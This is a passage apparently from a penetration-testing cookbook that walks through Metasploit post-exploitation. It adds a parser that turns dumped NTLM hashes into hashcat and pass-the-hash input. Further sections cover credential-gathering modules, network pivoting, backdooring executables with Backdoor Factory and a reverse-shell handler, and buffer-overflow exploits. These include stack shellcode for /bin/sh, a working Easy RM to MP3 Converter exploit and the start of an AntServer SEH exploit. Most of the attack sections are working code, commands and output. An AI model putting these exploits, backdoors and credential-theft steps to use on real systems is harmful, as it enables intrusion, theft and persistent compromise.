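Hash tables like the msv output above get copied into cracking and pass-the-hash tools, so it pays to parse them properly rather than by eye. The following is an added example for this page, not part of mimikatz or Metasploit: it parses a table in the msv format, flags the empty-LM marker, empty NT passwords and no-credential rows, and emits the user:hash lines hashcat -m 1000 expects and the LM:NT string that Metasploit's psexec takes as SMBPass. SAMPLE is a constructed table; its hashes are the well-known empty-password values and the NT hash of the word password, not data from the recipe's machine.

```python
#!/usr/bin/env python3
"""Turn the meterpreter 'msv' table into something usable: which sessions
carry a real NTLM hash, which are empty-password or no-credential rows, and
the strings hashcat and psexec want.

Added example for this page, not part of mimikatz or Metasploit. SAMPLE is a
constructed table in the shape of the msv output above; its hashes are the
well-known LM/NT hashes of an empty password and the NT hash of "password".
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" => no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""

SAMPLE = """\
msv credentials
===============

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;76485  NTLM       WIN-UH33216CD08  bugsbounty        lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;12345  NTLM       WIN-UH33216CD08  guest             lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;996    Negotiate  WORKGROUP        WIN-UH33216CD08$  n.s. (Credentials KO)
"""

ROW_RE = re.compile(r"^(?P<authid>\d+;\d+)\s+(?P<package>\S+)\s+(?P<rest>.+?)\s*$")
HASH_RE = re.compile(r"lm\{\s*(?P<lm>[0-9a-fA-F]{32})\s*\},\s*ntlm\{\s*(?P<nt>[0-9a-fA-F]{32})\s*\}")
KO_RE = re.compile(r"n\.s\.\s*\(Credentials KO\)")


def parse_msv(text):
    """One dict per session row: authid, package, domain, user, lm, nt, flags."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:                      # headers, rulers and blank lines
            continue
        rest = m.group("rest")
        h, ko = HASH_RE.search(rest), KO_RE.search(rest)
        pw_start = (h or ko).start() if (h or ko) else len(rest)
        # Domain and user are separated by two or more spaces; domains such
        # as "NT AUTHORITY" contain a single space, so never split on one.
        cols = re.split(r"\s{2,}", rest[:pw_start].strip())
        domain, user = (cols + ["", ""])[:2]
        lm, nt = (h.group("lm").lower(), h.group("nt").lower()) if h else (None, None)
        flags = set()
        if ko or not h:
            flags.add("no-credentials")
        if lm == EMPTY_LM:
            flags.add("no-lm-hash")
        if nt == EMPTY_NT:
            flags.add("empty-password")
        rows.append({"authid": m.group("authid"), "package": m.group("package"),
                     "domain": domain, "user": user, "lm": lm, "nt": nt, "flags": flags})
    return rows


def hashcat_lines(rows):
    """user:NThash lines for 'hashcat -m 1000', skipping empty and missing hashes."""
    return ["%s:%s" % (r["user"], r["nt"]) for r in rows
            if r["nt"] and "empty-password" not in r["flags"]]


def smbpass(row):
    """LM:NT form accepted by Metasploit's psexec SMBPass option for pass-the-hash."""
    if not row["nt"]:
        raise ValueError("no hash for %s" % row["user"])
    return "%s:%s" % (row["lm"] or EMPTY_LM, row["nt"])


if __name__ == "__main__":
    for r in parse_msv(SAMPLE):
        print("%-8s %-16s %-17s %s" % (r["authid"], r["domain"], r["user"],
                                       ", ".join(sorted(r["flags"])) or "usable NT hash"))
    print("\n".join(hashcat_lines(parse_msv(SAMPLE))))
```

Only bugsbounty ends up in the cracking list: the guest row carries the empty-password NT hash (nothing to crack, and a pass-the-hash with it is just an empty password), and the service rows have no credentials at all. The same parse feeds set SMBPass in exploit/windows/smb/psexec when you would rather pass the hash than crack it.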


Dumping other saved passwords from the 
machine 


You have already learned about dumping and saving plaintext passwords from the memory. However, 
sometimes, not all passwords are dumped. Not to worry; Metasploit has other post-exploitation modules, 
using which we can gather saved passwords of different applications and services running on the server 
we compromised. 


How to do it... 


First, let's check what applications are installed on the machine. We use this module: 


| use post/windows/gather/enum_applications 


msf > use post/windows/gather/enum_applications 
msf post(enum_applications) > show options 

Module options (post/windows/gather/enum_applications): 

   Name     Current Setting  Required  Description 
   ----     ---------------  --------  ----------- 
   SESSION                   yes       The session to run this module on. 





We see the options; now all we need is our session, using the following command: 


| set session 1 


Run it and we will see the list of applications installed on the system: 





Now that we know what applications are running, let's try to collect more information. 


We will use post/windows/gather/enum_chrome. 


It will gather the browsing history, saved passwords, bookmarks, and so on from Chrome profiles. The saved 
passwords are protected with DPAPI under the user's own account, so the module does best from a session 
running as that user. Again, we set our session and run it: 


| run post/windows/gather/enum_chrome 


Now we will try to gather the stored configuration and credentials of the FileZilla Server (the FTP server 
that can be used to transfer files) that is installed on the machine. We will use this module: 


| use post/windows/gather/credentials/filezilla_server 


msf post(enum_applications) > search filezilla 
[!] Database not connected or cache not built, using slow search 

Matching Modules 
================ 

   Name                                              Rank    Description 
   ----                                              ----    ----------- 
   auxiliary/dos/windows/ftp/filezilla_server_port   normal  FileZilla FTP Server Admin Interface Denial of Service 
   post/windows/gather/credentials/filezilla_server  normal  Windows Gather FileZilla FTP Server Credential Collection 


We set the session and run it, and we should see the saved credentials: 










Let's use another post-exploitation module to dump the password hashes of a local SQL Server. We will use this: 


| use post/windows/gather/credentials/mssql_local_hashdump 


msf > use post/windows/gather/credentials/mssql_local_hashdump 
msf post(mssql_local_hashdump) > set SESSION 2 
SESSION => 2 
msf post(mssql_local_hashdump) > run -j 





We set the session and run it with run -j (as a background job). The module checks that it has a SYSTEM 
session before it goes after the SQL Server process, then prints the hashes. These are SQL Server password 
hashes (0x0100, a 4-byte salt, then SHA-1 over the UTF-16 password and salt), which John the Ripper 
(the mssql05 format) or hashcat (-m 132) can attack offline: 


msf post(mssql_local_hashdump) > run -j 
[*] Post module running as background job 
[*] Running module against PORTAL 
[*] Checking if user is SYSTEM... 
[+] User is SYSTEM 
[*] Identified service 'SQL Server (SQLEXPRESS)', PID: 1792 
[*] Attempting to get password hashes... 
[+] sa: 0x01004D6196F9B58F9609BC51D7CF47C2C2AB821CC4DAA879A0A1 
[+] ##MS_PolicyTsqlExecutionLogin##: 0x01008D22A249DF5EF3B79ED321563A1DCCDC9CFC5FF954DD2D0F 
[+] ##MS_PolicyEventProcessingLogin##: 0x0100AE86B3442FF84691E83FE9D1522CF4F6268FCE0D3D692606 
[*] MSSQL password hash saved in: /Users/xXxZombieSenpaixXx/.msf4/loot/20161119062617_def 





Pivoting into the network 


Once we have complete control over a computer in the system, our next step should be to pivot into the 
network and try exploiting and getting access to as many machines as possible. In this recipe, you will 
learn the easy way to do that with Metasploit. 


How to do it... 


Metasploit has a built-in meterpreter script that adds a route through the current session, so that we can 
attack other machines in an internal subnet using the compromised one as the hop. The concept is really simple; 
all we have to do is execute this from the meterpreter prompt, giving the internal subnet we found earlier: 


| run autoroute -s <IP subnet> 


For example, run autoroute -s 192.168.122.0/24; run autoroute -p prints the routing table. Newer versions of 
Metasploit provide the same as the post/multi/manage/autoroute module. Once the route exists, Metasploit modules 
reach the internal hosts directly; for tools outside Metasploit, start auxiliary/server/socks_proxy and point 
proxychains at it. 





Once this is done, we can simply exploit the machines using the same methods that we covered in the 
previous recipes. 


Backdooring for persistence 


An important part of successful exploitation is to be able to keep access to the compromised machine. In 
this recipe, you will learn about an amazing tool known as the Backdoor Factory. The main goal of 
Backdoor Factory is to patch Windows/Linux binaries with our shell code so that the executable runs 
normally, along with executing our shell code every time it executes. 


How to do it... 


Backdoor Factory comes installed with Kali and can be run as backdoor-factory. To view all the 
features of this tool, we use the help option: 


| backdoor-factory -h 


:~# backdoor-factory -h 
Usage: backdoor.py [options] 

Options: 
  -h, --help            show this help message and exit 
  -f FILE, --file=FILE  File to backdoor 
  -s SHELL, --shell=SHELL 
                        Payloads that are available for use. Use 'show' to see payloads. 
  -H HOST, --hostip=HOST 
                        IP of the C2 for reverse connections. 
  -P PORT, --port=PORT  The port to either connect back to for reverse 
                        shells or to listen on for bind shells 
  -J, --cave_jumping    Select this options if you want to use code cave 
                        jumping to further hide your shellcode in the binary. 




Usage of this tool is not too hard; however, it is recommended that the binaries be tested 
before being deployed on the target system. 


To view what options are available for a particular binary we choose to backdoor, we use the following 
command: 


| backdoor-factory -f <path to binary> -s show 


[*] In the backdoor module 
[*] Checking if binary is supported 
[*] Gathering file info 
[*] Reading win32 entry instructions 
The following WinIntelPE32s are available: (use -s) 
   cave_miner_inline 
   iat_reverse_tcp_inline 
   iat_reverse_tcp_inline_threaded 
   iat_reverse_tcp_stager_threaded 
   iat_user_supplied_shellcode_threaded 
   meterpreter_reverse_https_threaded 
   reverse_shell_tcp_inline 
   reverse_tcp_stager_threaded 
   user_supplied_shellcode_threaded 


We will then use iat_reverse_tcp_stager_threaded: 


| backdoor-factory -f <path to binary> -s iat_reverse_tcp_stager_threaded -H <our IP> -P <Port> 





Next, we choose the cave we want to use for injecting our payload. A cave is a run of unused bytes in the 
binary; it must be at least as long as the payload (407 bytes here), and a cave inside an existing section 
such as .data is less conspicuous than one outside any section: 


[*] Cave 1 length as int: 407 
[*] Available caves: 
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x21c End: 0x3fc; Cave Size: 480 
2. Section Name: None; Section Begin: None End: None; Cave begin: 0xa01a End: 0xa208; Cave Size: 494 
3. Section Name: .data; Section Begin: 0xa200 End: 0xe000; Cave begin: 0xb185 End: 0xb3ac; Cave Size: 551 
4. Section Name: .data; Section Begin: 0xa200 End: 0xe000; Cave begin: 0xb3f1 End: 0xd3ec; Cave Size: 8187 
5. Section Name: .data; Section Begin: 0xa200 End: 0xe000; Cave begin: 0xde40 End: 0xdffc; Cave Size: 444 
************************************************** 





Our binary has been created and is ready to be deployed. 


Now all we need to do is to run a handler that will accept the reverse connection from our payload: 


msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp 
msf exploit(handler) > set lhost 192.168.110.41 
lhost => 192.168.110.41 
msf exploit(handler) > set lport 4444 
lport => 4444 
msf exploit(handler) > run 





Now when the .exe is executed on the victim machine, the original program runs as normal and we have our 
meterpreter connected. 





Buffer Overflows 


In this chapter, we will cover the following recipes: 


Exploiting stack-based buffer overflows 
Exploiting buffer overflow on real software 
SEH bypass 

Exploiting egg hunters 

An overview of ASLR and NX bypass 


Introduction 


In a software program, buffer overflow occurs when a program, while writing data to a buffer, overruns 
the buffer size allocated and starts overwriting data to adjacent memory locations. 


A buffer can be considered a temporary area in the memory allocated to a program to store and retrieve 
data when needed. 


Buffer overflows have been exploited for a very long time.


When exploiting buffer overflows, our main focus is on overwriting some control information so that the 
flow of control of the program changes, which will allow our code to take control of the program. 


Here is a diagram that will give us a basic idea of an overflow happening in a buffer: 


[Diagram: a stack holding a 16-byte buffer (letters 1-4, 5-8, 9-12, 13-16) with the program's instructions below it and the return address above it; writing 8 characters fills only the first two slots of the buffer]





From the preceding diagram, we can assume this is what a program looks like. Since it is a stack, it starts 
from bottom and moves toward the top of the stack. 


Looking at the preceding diagram, we also notice that the program has a fixed buffer to store 16 letters/bytes
of data.


We first enter the 8 characters (1 char=1 byte); on the right-hand side of the diagram, we can see that they 
have been written in the buffer of the program's memory. 


Let's see what happens when we write 20 characters into the program: 


[Diagram: the same stack after writing 20 characters; the buffer slots for letters 1-16 are full, and the last 4 characters overwrite the Return Address, which now directs the program to the hacker's code]

Source: http://www.cbi.umn.edu/


We can see that data is correctly written up to 16 characters, but the last 4 characters have now gone out of
the buffer and have overwritten the value stored in the Return Address of the program. This is where a
classic buffer overflow occurs.


Let's look at a live example; we will take a sample code: 


#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    char buffer[5];                 /* room for 4 characters plus the terminating NUL */
    if (argc < 2) {
        printf("strcpy() NOT executed....\n");
        printf("Syntax: %s <characters>\n", argv[0]);
        exit(0);
    }
    strcpy(buffer, argv[1]);        /* no length check: longer input overruns buffer */
    printf("buffer content= %s\n", buffer);
    // you may want to try strcpy_s()
    printf("strcpy() executed...\n");
    return 0;
}


The preceding program simply takes an input at runtime and copies it into a variable called buffer. We can
see that the size of the variable buffer is set to 5.


We now compile it using this command: 


gcc program.c -o program
We need to be careful as gcc by default has inbuilt security features, which prevent buffer overflows. 


We run the program using this command: 


./program 1234


We see that it has stored the data and we get the output. 


Let's now run this: 


./program 12345

We will see the program exit with a segmentation fault. This is the enabled security feature of gcc.


We will learn more about the return address in the next recipe. However, overwriting the return address 
with our own code can cause a program to behave differently from its usual execution and helps us in 
exploiting the vulnerability. 


Fuzzing is the easiest way to discover buffer overflows in a program. There are various fuzzers available
in Kali, or we can write a custom script to make our own, depending on the type of program we have.


Once fuzzing is done and a crash occurs, our next step is to debug the program to find the exact part where 
a program crashes and how we can use it to our advantage. 


Again, there are multiple debuggers available online. My personal favorite for Windows is Immunity 
Debugger (Immunity Inc.). Kali also comes with an inbuilt debugger, GDB. It is a command-line 
debugger. 


Before we jump any further into more exciting topics, note that there are mainly two types of buffer
overflows that usually happen in a program:

• Stack-based overflows
• Heap-based overflows


We will be covering these in more detail in the later part of the chapter. For now, let's clear up some 
basics, that will help us in exploiting overflow vulnerabilities. 


Exploiting stack-based buffer overflows 


Now that our basics are clear, let's move on to the exploitation of stack-based buffer overflows. 


How to do it... 


The following steps demonstrate the stack-based buffer overflow: 


1. Let's take a look at another simple C program: 


#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[120];
    strcpy(buf, argv[1]);   /* unchecked copy: this is the overflow we are going to exploit */
    printf(buf);            /* user data passed as the format string, as in the book */
    return 0;
}

This program uses the vulnerable function strcpy(). We save the program to a file.
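Both this program and the buffer[5] program in the introduction copy argv[1] with strcpy(), which never checks the destination size. As an added example (not code from the book), here is the bounds-checked replacement for that pattern; bounded_copy and try_copy are names chosen here, and the 128-byte cap in try_copy is an assumption for the self-test.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the book: a bounded replacement for
 * strcpy(buffer, argv[1]). It never writes past dstsz bytes and reports
 * when the input had to be cut, which is exactly the case in which
 * strcpy() would have overrun the buffer and reached the return address. */

/* Copy src into dst, storing at most dstsz-1 characters plus a NUL.
 * Returns 1 if src did not fit (truncated), 0 otherwise. dst is always
 * NUL-terminated when dstsz > 0. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);

    if (dstsz == 0)
        return 1;                      /* nothing can be stored at all */
    if (n >= dstsz) {                  /* n characters + NUL do not fit */
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);           /* fits, terminator included */
    return 0;
}

/* Self-check helper (hypothetical, for the example only): copy src into a
 * local buffer of the requested size (capped at 128) and return the stored
 * length, or -1 when the input was truncated. */
int try_copy(const char *src, size_t dstsz)
{
    char buf[128];

    if (dstsz > sizeof buf)
        dstsz = sizeof buf;
    if (bounded_copy(buf, dstsz, src))
        return -1;
    return (int)strlen(buf);
}

int main(int argc, char *argv[])
{
    char buffer[5];                    /* same size as the first program */

    if (argc < 2) {
        printf("Syntax: %s <characters>\n", argv[0]);
        return 1;
    }
    if (bounded_copy(buffer, sizeof buffer, argv[1]))
        printf("input longer than %zu bytes, truncated\n", sizeof buffer - 1);
    /* Always pass user data as an argument, never as the format string. */
    printf("buffer content= %s\n", buffer);
    return 0;
}
```

Run with `./program 1234` and `./program 12345` as in the introduction: the second call now reports truncation instead of overrunning the stack.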


2. We then compile the program with gcc using the -fno-stack-protector and -z execstack flags:


gcc -ggdb name.c -o name -fno-stack-protector -z execstack


3. Next, we turn off address space randomization using this: 


echo 0 > /proc/sys/kernel/randomize_va_space


4. Now we open our program in gdb using this command:


gdb ./name


The following screenshot shows the output of the preceding command: 


:~/Desktop# gdb ./name
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./name...done.
(gdb)





5. Next, we supply our input using Python using the following command: 


r $(python -c 'print "A"*124')


The following screenshot shows the output of the preceding command: 


(gdb) r $(python -c 'print "A"*124')
Starting program: /root/Desktop/test $(python -c 'print "A"*124')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()





6. We can see that the program crashed and it shows the error 0x41414141. This just means that the character
we entered, A, has overwritten the EIP.


7. We confirm it by typing i r: 


[Screenshot: output of `i r`; the first register (eax) holds 0x7c (124), esp holds 0xbffff200, ebp/esi/edi hold 0x0, eip reads 0x41414141 and eflags 0x10286 [ PF SF IF RF ]]





This shows us that the value of the EIP register has been successfully overwritten. 

Next, we find the exact byte that overwrites the EIP. We can do this by entering different characters 
in our program and then checking which of them overwrites the EIP. 

So we run the program again, this time, with different characters: 


r $(python -c 'print "A"*90+"B"*9+"C"*25') 


The following screenshot shows the output of the preceding command: 


Starting program: /root/Desktop/test $(python -c 'print "A"*90+"B"*9+"C"*25')

Breakpoint 1, main (argc=2, argv=0xbffff2c4) at test.c:6
6         strcpy(buf, argv[1]);
(gdb) c
Continuing.

Breakpoint 2, main (argc=1128481603, argv=0x43434343) at test.c:7
7         printf (buf);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()





This time, we see that the EIP has the value 0x43434343 (CCCC). This implies that the bytes we need are somewhere
in the last 25 characters we supply.


We similarly try different combinations of 124 characters until we have the position of the exact 4 
characters that overwrite the EIP: 


Starting program: /root/Desktop/test $(python -c 'print "A"*100+"B"*4+"C"*20')

Breakpoint 1, main (argc=2, argv=0xbffff2c4) at test.c:6
6         strcpy(buf, argv[1]);
(gdb) c
Continuing.

Breakpoint 2, main (argc=1128481603, argv=0x43434343) at test.c:7
7         printf (buf);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()





Now, since we have found the exact location of the EIP, in order to perform a successful
exploitation we need to overwrite these 4 bytes with the memory address where we will store our
shellcode. We have about 100 bytes in the memory where the As are stored currently, which is more than
enough for our shellcode. So, we need to add breakpoints in our debugger, where it will stop before
jumping to the next instruction.

We list the program using the list 8 command:


(gdb) list 8
3       void main(int argc, char *argv[])
4       {
5           char buf[120];
6           strcpy(buf, argv[1]);
7           printf (buf);
8       }
(gdb) b 6
Breakpoint 1 at 0x8048451: file test.c, line 6.
(gdb) b 7
Breakpoint 2 at 0x8048469: file test.c, line 7.
(gdb)





15. And we add our breakpoints on the line where the function is called and on the line after it using
b <linenumber>.


16. Now we run the program again, and it will stop at the breakpoint: 


(gdb) r $(python -c 'print "A"*100+"B"*20+"C"*4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /root/Desktop/test $(python -c 'print "A"*100+"B"*20+"C"*4')

Breakpoint 1, 0x0804843b in main ()
(gdb) c
Continuing.





17. We press c to continue. 
18. Now let's see the esp (stack pointer) register: 


x/16x $esp 


The following screenshot shows the output of the preceding command: 


(gdb) x/16x $esp
[Screenshot: the `x/16x $esp` output; the rows start at 0xbffff190, 0xbffff1a0 and 0xbffff1b0 and are filled with 0x41414141, followed by an `i r` listing in which eip reads 0x8048469 <main+46>]


19. This will show us 16 bytes after the esp register, and on the left-hand side column, we will see the 
memory address corresponding to the data being stored. 


20. Here, we see that data starts at address 0xbffff190. We note the next memory address, 0xbffff1a0. This is
the address we will write into the EIP. When the program overwrites the EIP, it will make it
jump to this address, where our shellcode will be stored:


(gdb) r $(python -c 'print "A"*100+"B"*4+"C"*20')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /root/Desktop/test $(python -c 'print "A"*100+"B"*4+"C"*20')

Breakpoint 1, main (argc=2, argv=0xbffff2c4) at test.c:6
6         strcpy(buf, argv[1]);

(gdb) x/60x $esp
[Screenshot: memory rows from 0xbffff200 to 0xbffff270, filled with 0x41414141 and ending in 0x42424242 followed by 0x43434343]

Breakpoint 2, main (argc=1128481603, argv=0x43434343) at test.c:7
7         printf (buf);


21. Let's try to open a shell by exploiting the overflow. We can find the shellcode that will execute a 
shell for us on Google: 





https://www.exploit-db.com/exploits/39160/

[Screenshot of the Exploit-DB page: Linux/x86 - execve "/bin/sh" Shellcode (24 bytes); EDB-ID: 39160; Author: Dennis 'dhn' Herrmann; Published: 2016-01-04; Platform: Lin_x86; Shellcode Size: 24 bytes]

We have 100 bytes and our shellcode is 24 bytes. We can use this one in our exploit.
Now we simply replace the As with 76 no-op assembly instructions (0x90) and the remaining 24
bytes with the shellcode, then the Bs with the memory address we want the EIP to point to, and the Cs
with the no-op code again. This should look something like this:

"\x90"*76+"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"+"\xa0\xff\xf1\xbf"+"\x90"*20


Let's rerun the program and pass this as an input: 


r $(python -c 'print "\x90"*76+"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"+"\xa0\xff\xf1\xbf"+"\x90"*20')


We type c to continue from breakpoints, and once execution is done, we will have our shell executed. 


Exploiting buffer overflow on real software 


You have learned the basics of exploitation earlier. Now let's try these on some of the software already 
exploited long ago and with public exploits available. In this recipe, you will learn about publicly 
available exploits for old software and create your own version of the exploit for it. 


Before we begin, we will need an old version of a Windows OS (preferably, Windows XP) and a 
debugger for Windows. I have used Immunity Debugger and an old software with a known buffer 
overflow vulnerability. We will use Easy RM to MP3 Converter. This version had a buffer overflow 
vulnerability in playing large M3U files. 


Getting ready 


The free version of Immunity Debugger can be downloaded at https://www.immunityinc.com/products/debugger/. 


How to do it... 


Follow the given steps to learn about it: 


1. First, we download and install our MP3 converter on the machine.

2. This converter had a vulnerability in playing M3U files. The software crashed when a large file was 
opened for conversion with it. 

3. Let's create a file with about 30,000 As written into it and save it as <filename>.m3u:


[Screenshot: the M3U file of As open in Notepad, and the Windows dialog "Easy RM to MP3 Converter has encountered a problem and needs to close. We are sorry for the inconvenience." with a Send Error Report button]





5. Now we need to find the exact number of bytes that cause the crash. 


6. Typing so many As manually in a file will take a lot of time, so we write a simple Python program to
do that for us:


# 30,000 As written to an M3U file that the converter will try to open
a = "A" * 30000

file = open("crash.m3u", "w")
file.write(a)
file.close()


7. Now we play around with bytes to find the exact value of the crash. 
8. In our case, it came out to be 26,105 as the program did not crash at 26,104 bytes: 


[Screenshot: the Easy RM to MP3 Converter window after loading the file]
9. Now, we run our debugger and attach our running converter program to it by navigating to File |
Attach:

[Screenshot: Immunity Debugger File menu with Open (F3), Attach (Ctrl+F1) and Exit (Alt+X)]


10. Then, we select the process name from the list of running programs: 


[Screenshot: the "Select process to attach" dialog with Attach and Cancel buttons]


11. Once it is attached, we open our M3U file in the program. We will see a warning in the status bar of
the debugger. We simply click on continue by pressing the F9 key or clicking on the play button from
the top menu bar:

[Screenshot: the Immunity Debugger toolbar]








12. We will see that the EIP was overwritten with As and the program crashed:

[Screenshot: the Immunity Debugger registers pane after the crash, with EIP overwritten by 41414141]





Now we need to find the exact 4 bytes that cause the crash. We will use the script from Kali known
as pattern_create. It generates a unique pattern for the number of bytes we want.


We can find the path of the script using the locate command: 
locate pattern_create 


The following screenshot shows the output of the preceding command: 


# locate pattern_create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb





Now that we have the path, we run the script and pass the number of bytes: 


ruby /path/to/script/pattern_create.rb 5000 


We used 5,000 because we already know it will not crash at 25,000, so we only create a pattern for
the next 5,000 bytes.

We have our unique pattern. We now paste this in our M3U file along with 25,000 As.

We open up our application and attach the process to our debugger: 


[Screenshot: the "Select process to attach" dialog with Attach and Cancel buttons]


We then drag and drop our M3U file into the program.
It crashes and we have our EIP overwritten with 42386b42.
Metasploit has another great script to find the location of the offset:


ruby /path/to/script/pattern_offset.rb -q 0x42386b42


Now we have the offset match at 1104; adding it to the 25,000 As, we now know that EIP is
overwritten after 26,104 bytes:


:/media/sf_Downloads/BOOK# ruby /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x42386b42
[*] Exact match at offset 1104


Next, we need to find out a reliable way of jumping to the shellcode. We do this by simply writing 
extra random characters into the stack after EIP, making sure the shellcode we write will be written 
properly into the memory. 

We run the program, attach it to the debugger, and let it crash. 

We will see the EIP has been overwritten successfully. In the window in the bottom-right corner, we 
right-click and select Go to ESP: 


[Screenshot: the stack pane context menu in Immunity Debugger (Copy to clipboard, Modify, Edit, Push DWORD, Pop DWORD, Search for address, Search for binary string, Go to ESP, Go to EBP, Go to expression, Appearance) with Go to ESP selected]


Here, we notice that the ESP actually starts from the 5th byte. To make sure our shellcode is executed 
properly, we now need to make sure shellcode starts after 4 bytes. We can insert four NOPs to fix 
this: 





Since we have control over EIP, there are multiple ways to execute our shellcode, and we will cover
two of them here. The first one is simple: we find the jmp esp instruction in the code and overwrite the
address with it. To do that, we right-click and navigate to Search for | All commands in all modules:

[Screenshot: the Search for submenu in Immunity Debugger, with the entries Name (label) in current module, Name in all modules, All commands in all modules and All sequences in all modules]

28. We type the jmp esp instruction: 


[Screenshot: the "Find all commands" dialog with jmp esp entered]





29. In the results box, we see our instruction, and we copy the address for our exploit.


30. Let's write an exploit now. The basic concept would be junk bytes + address of jmp esp + NOP bytes +
shellcode:


# 26,104 bytes of junk, the jmp esp address (little-endian), the calc.exe shellcode and NOP padding
a = "A"*26104 + "\x3A\xF2\xA8\x01" + "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x61\xC6\x45\xFA\x6C\xC6\x45\xFB\x63\x8D\x45\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" + "\x90"*100

file = open("crash.m3u", "w")
file.write(a)
file.close()








31. We can generate the shellcode of the calculator: 


msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f c


32. Now we run the exploit, and we should see the calculator open once the program crashes! 


[Screenshot: Immunity Debugger with the Windows Calculator opened by the payload]


Let's try another method; suppose there are no jmp esps available for us to use. In this case, we can 
use push esp and then use the ret instruction, which will move the pointer to the top of the stack and 
then call the esp. 

We follow the same steps until step 25. Then, we right-click and go to Search for | All sequences in
all modules. Here, we type push esp ret:

[Screenshot: the "Find sequence of commands" dialog in Immunity Debugger with push esp ret entered; the hint reads 'RA' and 'RB' match R32, 'ANY n' matches 0..n commands]





36. In the result, we see we have the sequence at the address: o18F.pss.


37. Now we simply replace the EIP address in our exploit code with this and run the exploit, and we 
should have a calculator open up: 





[Screenshot: the Windows Calculator opened after running the modified exploit]





SEH bypass 


Before we start, we need to understand what SEH is. SEH stands for structured exception handling. We 
may have often seen programs popping up an error saying the software has encountered a problem and 
needs to close. This basically means it's the default exception handler of Windows kicking in. 


SEH handlers can be considered the block of try and catch statements that are executed in order when 
there's an exception in the program. This is what a typical SEH chain would look like: 





[Diagram: the SEH chain on the stack, from top to bottom. Each record is 2 x 4 bytes: a pointer to the next SEH record and a pointer to the exception handler (Exception_handler1(), Exception_handler2(), Exception_handler3()). The last record's next pointer is 0xFFFFFFFF and its handler is the default exception handler, MSVCRT!exhandler, at the bottom of the stack.]

Source: https://www.corelan.be/wp-content/uploads/2009/07/image_thumb45.png


When an exception occurs, the SEH chain comes to the rescue and handles the exception based on its type. 


So, when an illegal instruction occurs, the application gets a chance to handle the exception. If no 
exception handler is defined in the application, we will see an error shown by Windows: something like 
Send a report to Microsoft. 


To perform a successful exploitation of a program with the SEH handler, we first try to fill the stack with 
our buffer and then try to overwrite the memory address that stores the first SEH record chain. However, 
that is not enough; we need to generate an error as well, that will actually trigger the SEH handler and 
then we will be able to gain complete control over the execution flow of the program. An easy way is to 
keep filling the stack all the way down, which will create an exception to be handled, and since we 
already have control over the first SEH record, we will be able to exploit it. 


How to do it... 


In this recipe, you will learn how to do this: 


1. Let's download a program called AntServer. It has a lot of public exploits available, and we will try 
to build our own exploit for it. 

2. We will install it on the Windows XP SP2 machine that we used in the previous recipe. 

3. AntServer had a vulnerability that could be triggered by sending a long USV request to the AntServer
running on port 6660:







4. Let's run the AntServer by opening the software and navigating to Server | Run Service Control...: 


[Screenshot: the BigAnt Console with Server | Run Service Control... selected; the service list shows AntServer (BigAnt Messaging Service), AVServer (BigAnt Audio&Video Service) and AntDS (BigAnt Document Service), all with status Running]








5. Now let's write a simple Python script, that will send a large request to this server on port 6600: 


#!/usr/bin/python
import socket

address = "192.168.110.6"
port = 6660

# "USV " followed by 2,500 bytes of 0x41 ("A") and the request terminator
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
sock.send(buffer)
sock.close()


6. Coming back to the Windows machine, let's start Immunity Debugger and attach the process 
AntServer.exe to it. And then, click on run. 


7. Once the program is running, we run our Python script from Kali, and in our debugger we will see an access
violation error. However, our EIP has not been overwritten yet:


[Screenshot: the Immunity Debugger View menu: Log (Alt+L), Executable modules (Alt+E), Memory (Alt+M), Threads, Windows, Handles, CPU (Alt+C), SEH chain (Alt+S), Patches (Ctrl+P), Call stack (Alt+K)]


